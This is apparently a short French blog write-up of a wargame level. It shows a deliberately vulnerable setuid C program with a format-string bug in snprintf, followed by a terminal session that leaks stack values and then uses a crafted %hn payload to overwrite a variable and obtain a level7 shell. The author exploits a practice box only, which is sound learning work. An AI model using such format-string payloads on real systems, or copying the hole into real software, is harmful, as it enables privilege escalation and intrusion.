OMG ! Encore !
Ouai...Ben là c'est juste encore pour préciser que j'adore exploiter ce genres de failles sur les box :)
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv){
int i = 1;
char buffer[64];
snprintf(buffer, sizeof buffer, argv[1]);
buffer[sizeof (buffer) - 1] = 0;
printf("Change i's value from 1 -> 500. ");
if(i==500){
printf("GOOD\n");
seteuid(1007);
system("/bin/sh");
}
printf("No way...let me give you a hint!\n");
printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
printf ("i = %d (%p)\n", i, &i);
return 0;
}
level6@0xtcebBox:whoami
level6
level6@0xtcebBox:/wargame$ ./level6 hello
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [hello] (5)
i = 1 (0xbffffa5c)
level6@0xtcebBox:/wargame$ ./level6 %08x
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [0177ff8e] (8)
i = 1 (0xbffffa5c)
level6@0xtcebBox:/wargame$ ./level6 `python -c "print 'aaaa'+'.%08x'*15"`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [aaaa.0177ff8e.01000000.00000000.28000000.656e6f6e.61616161.3731] (63)
i = 1 (0xbffffa0c)
level6@0xtcebBox:/wargame$ ./level6 `python -c "print 'aaaa'+'%.496u'+'%6\x24x'"`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [aaaa00000000000000000000000000000000000000000000000000000000000] (63)
i = 1 (0xbffffa4c)
level6@0xtcebBox:/wargame$ ./level6 `python -c "print '\x4c\xfa\xff\xbf'+'%.496u'+'%6\x24hn'"`
Change i's value from 1 -> 500. GOOD
sh-3.1$ whoami
level7
Aucun commentaire:
Enregistrer un commentaire